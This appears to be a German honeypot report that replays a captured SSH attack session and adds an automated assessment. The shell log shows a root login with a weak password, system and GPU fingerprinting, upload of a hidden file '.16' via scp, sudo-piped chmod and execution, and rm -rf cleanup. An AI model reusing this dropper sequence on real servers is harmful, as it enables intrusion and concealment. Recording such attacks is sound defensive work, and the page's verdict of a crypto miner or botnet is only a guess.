ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Deutschland: BusyBox-Ausbruch und Schadcode nachladen

02.10.2026, 22:15 UTC · 17 Befehle · über ssh · Deutschland · 16× wiederholt

Überblick

Dienst
ssh (Port 22)
Herkunft
Deutschland · Contabo GmbH
Probierte Zugangsdaten
root / !root
Gleiche Sitzung gesehen
16×

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH
root@srv01:~$ uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo "")
root@srv01:~$ arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo "")
root@srv01:~$ uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null)
root@srv01:~$ cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null)
root@srv01:~$ gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null )
root@srv01:~$ echo "UNAME:$uname"
UNAME:Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) docker-01 x86_64
root@srv01:~$ echo "ARCH:$arch"
ARCH:x86_64
root@srv01:~$ echo "UPTIME:$uptime"
UPTIME:3110400.12 3456000.45
root@srv01:~$ echo "CPUS:$cpus"
CPUS:16
root@srv01:~$ echo "GPU:$gpu_info"
GPU:
root@srv01:~$ scp -qt "/dev/shm/.16"
root@srv01:~$ scp -qt "/var/tmp/.16"
root@srv01:~$ echo '!root' | sudo -S sh -c 'chmod +x '\''/.16'\''' || echo '!root' | sudo -S chmod +x '/.16' || sh -c 'chmod +x '\''/.16'\''' || chmod +x '/.16'
chmod: cannot access '/.16': No such file or directory
!root
!root
root@srv01:~$ echo '!root' | sudo -S sh -c ''\''/.16'\''' || echo '!root' | sudo -S '/.16' || sh -c ''\''/.16'\''' || '/.16'
bash: /.16: No such file or directory
!root
!root
root@srv01:~$ echo '!root' | sudo -S sh -c 'rm -rf '\''/.16'\''' || echo '!root' | sudo -S rm -rf '/.16' || sh -c 'rm -rf '\''/.16'\''' || rm -rf '/.16'
rm: cannot remove '/.16': No such file or directory
!root
!root
root@srv01:~$ echo '!root' | sudo -S sh -c '' || echo '!root' | sudo -S  || sh -c '' ||
bash: sudo: command not found
!root
!root

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich mit Standardzugangsdaten als Root an und führte eine Reihe von Systemabfragen durch, um die Hardwarekonfiguration zu ermitteln. Anschließend versuchte er, eine versteckte Datei namens .16 in temporäre Verzeichnisse zu kopieren und diese ausführbar zu machen. Nach dem Scheitern der Ausführung wegen fehlender Dateien wurden die Aufräumkommandos ausgeführt, um Spuren zu verwischen.

Was die Befehle bewirken

Die Kommandos uname, nproc und lspci sammeln technische Daten wie Betriebssystemversion, CPU-Architektur und Grafikkarteninformationen, wobei busybox als Fallback für minimale Systeme dient. Der Befehl scp -qt dient dem stillen Empfang von Dateien über das Secure Copy Protocol in die Pfade /dev/shm und /var/tmp. Die sudo -S Aufrufe versuchen, die empfangene Datei .16 ausführbar zu machen und zu starten, wobei das Passwort über die Standardeingabe nachgereicht wird. Das rm -rf Kommando soll die Datei nach dem Versuch löschen, um forensische Spuren zu beseitigen.

Worauf es hinauslief

Das Vorgehen deutet auf die Installation eines Botnet-Agents oder eines Kryptominers hin, da die Abfrage von CPU-Kernen und GPU-Informationen typisch für die Bewertung der Mining-Leistung ist. Das Kopieren in versteckte Dateien und das anschließende Löschen sind klassische Tarnmechanismen, um die Persistenz zu sichern oder die Analyse zu erschweren.

Einordnung

Dieses Muster ist extrem verbreitet und stammt oft aus automatisierten Skripten, die massenhaft SSH-Server mit schwachen Passwörtern scannen. Die hohe Wiederholungsrate und die generische Payload-Struktur deuten auf einen bekannten, weitverbreiteten Botnet-Wurm hin.